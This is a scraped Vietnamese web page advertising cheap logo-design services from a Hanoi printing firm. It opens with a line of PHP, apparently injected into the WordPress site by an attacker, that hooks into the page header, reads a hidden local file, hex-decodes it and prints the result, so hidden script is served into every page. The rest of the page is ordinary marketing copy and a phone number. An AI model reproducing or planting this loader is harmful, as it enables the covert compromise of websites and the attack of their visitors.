if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Thiết kế logo 10 - Thiết kế logo đẹp giá rẻ tại Hà Nội

Thiết kế logo 10

 admin3b    18/12/2019

Logo chính là linh hồn của bộ nhận diện thương hiệu. Thiết kế logo độc đáo và ấn tượng tức là bạn đã hoàn thiện 90%  bộ nhận diện hiệu quả và bắt mắt.

Để thiết kế logo đẹp đòi hỏi cả về khả năng sáng tạo cao, sự thấu hiểu khách hàng, một quy trình làm việc khoa học và quản lý hiệu quả. Tại In Bắc Việt, chúng tôi luôn tuân thủ quy trình làm việc khoa học để giúp sáng tạo những sản phẩm ấn tượng, lôi cuốn và thể hiện linh hồn của thương hiệu.

 DỊCH VỤ THIẾT KẾ  IN BẮC VIỆT MANG ĐẾN CHO QUÝ KHÁCH
 Một logo/ slogan ấn tượng truyền  tải sứ mệnh kinh doanh của doanh nghiệp bạn. Đơn giản – ngắn gọn – xúc tích táo dấu ấn sâu sắc trong lòng khách hàng.
 Một logo/ slogan phản ánh rõ nét, tăng tính nhận diện thương hiệu với khách hàng mực tiêu. Một logo nổi bật sẽ luôn trở thành trung tâm của sự chú ý, đánh bật các đối thủ xung quanh.
 Một logo/ slogan tài sản quý giá của doanh nghiệp phát triển cùng thời gian.

Khi đến với chúng tôi bạn còn nhận được đầy đủ
➢ Cẩm nang hướng dẫn sử dụng logo hiệu quả nhất
➢ Hồ sơ thiết kế, bao gồm file ảnh gốc, file thiết kế cùng file dành cho in ấn chuyên nghiệp
➢ Chứng nhận quyền sở hữu trí tuệ đối với mẫu, file thiết kế logo
 Hỗ trợ khách hàng vấn đề kỹ thuật và lưu trữ tài liệu
➢ Tư vấn chuyên sâu về xây dựng và phát triển thương hiệu

Thiết kế logo giá rẻ, uy tín

LÝ DO BẠN CHỌN IN BẮC VIỆT THIẾT KẾ LOGO CHO DỰ ÁN CỦA MÌNH

tich-xanh Hơn 2000+ khách hàng đã lựa chọn chúng tôi: và đó là lý do thuyết phục nhất để bạn lựa chọn

tich-xanh Chúng tôi là chuyên gia trong lĩnh vực thiết kế thương hiệu: thay vì hỏi bạn muốn logo như thế nào, chúng tôi tư vấn giúp bạn biết logo của bạn cần phải có những gì, bạn cần khác biệt đối thủ như thế nào …

tich-xanh Bạn sở hữu đội ngũ chuyên gia của chúng tôi: Một khi dự án bắt đầu, 4 họa sỹ thiết kế, 01 giám đốc sáng tạo và 01 chuyên gia tư vấn chiến lược thương hiệu sẽ cùng tham gia vào quá trình sáng tạo để đảm bảo cho mẫu thiết kế logo của bạn là sản phẩm sáng tạo và phù hợp nhất.

tich-xanh Chuyên nghiệp: Các dự án của chúng tôi được triển khai theo một quy trình chặt chẽ và khoa học với sự tham gia của các chuyên gia thương hiệu và sáng tạo.

tich-xanh Chi phí hợp lý: In Bắc Việt cam kết luôn đem lại hiệu quả lớn nhất trên chi phí đầu tư của bạn.

MỘT SỐ DỰ ÁN THIẾT KẾ LOGO ĐÃ THỰC HIỆN

Thiết kế logo giá rẻ, uy tín Thiết kế logo giá rẻ, uy tín Thiết kế logo giá rẻ, uy tín
Thiết kế logo giá rẻ, uy tín Thiết kế logo giá rẻ, uy tín Thiết kế logo giá rẻ, uy tín

 

 

 

Khách hàng quen thuộc

0914.89.88.22